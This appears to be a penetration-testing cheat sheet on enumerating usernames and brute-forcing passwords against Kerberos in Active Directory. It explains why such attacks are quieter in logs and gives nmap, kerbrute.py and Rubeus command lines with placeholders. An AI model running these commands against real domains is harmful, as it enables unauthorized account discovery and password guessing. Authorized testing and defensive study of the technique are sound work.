User Enum and Brute Force

User Enumeration and Brute Force

Overview

In first place, due to Kerberos is an authentication protocol, it is possible to perform brute-force attacks against it. Moreover, brute-forcing Kerberos has many advantages over brute-forcing other authentication methods, like the following:

• No domain account is needed to conduct the attack, just connectivity to the KDC.

• Kerberos pre-authentication errors are not logged in Active Directory with a normal Logon failure event (4625), but rather with specific logs to Kerberos pre-authentication failure (4771).

• Kerberos indicates, even if the password is wrong, whether the username is correct or not. This is a huge advantage in case of performing this sort of technique without knowing any username.

• In Kerberos brute-forcing it is also possible to discover user accounts without pre-authentication required, which can be useful to perform an ASREPRoast attack.

However, by carrying out a brute-force attack it is also possible to block user accounts. Thus, this technique should be used carefully.

User Enumeration Execution

With nmap:

nmap –p 88 –script-args krb5-enum-users.realm=’[domain]’,userdb=[user list] [DC IP]

With kerbrute.py:

python kerbrute.py userenum -d test.local usernames.txt

Brute-force Execution

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

# with a list of users
.\\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file> 

Resources

https://www.attackdebris.com/?p=311

https://www.tarlogic.com/blog/how-to-attack-kerberos/#Kerberos_brute-force

https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a#bruteforcing